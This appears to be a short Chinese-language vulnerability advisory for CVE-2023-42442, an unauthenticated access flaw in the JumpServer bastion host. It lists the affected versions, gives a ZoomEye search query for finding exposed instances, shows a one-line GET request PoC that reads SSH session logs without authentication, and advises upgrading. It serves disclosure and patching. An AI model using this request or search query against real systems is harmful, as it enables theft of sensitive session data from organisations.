CVE-2023-42442：JumpServer未授权访问漏洞

0x01 简介

JumpServer开源堡垒机是一款运维安全审计系统产品，提供身份验证、授权控制、账号管理、安全审计等功能支持，帮助企业快速构建运维安全审计能力。JumpServer开源堡垒机通过企业版或者软硬件一体机的方式，向企业级用户交付开源增值的运维安全审计解决方案。

0x02 漏洞概述

漏洞编号：CVE-2023-42442

该漏洞存在于JumpServer中，是一个未授权访问漏洞。api/api/v1/terminal/sessions/权限控制存在逻辑错误，可以被攻击者匿名访问。未经身份验证的远程攻击者可利用该漏洞下载ssh日志，并可借此远程窃取敏感信息。存储在 S3、OSS 或其他云存储中的ssh会话不受影响。

0x03 影响版本

3.0.0 <= JumpServer <= 3.5.4

3.6.0 <= JumpServer <= 3.6.3

0x04 环境搭建

使用ZoomEye网络空间搜索引擎

zoomeye语法 app:"飞致云堡垒机"

0x05 漏洞复现

漏洞POC:

/api/v1/terminal/sessions/

配置请求包

tips:GET请求包要空两行

GET /api/v1/terminal/sessions/ HTTP/1.1
Host: 127.0.0.1

0x06 修复方式

目前官方已有更新版本，升级至最新版本

下载地址：https://www.jumpserver.org/

推荐服务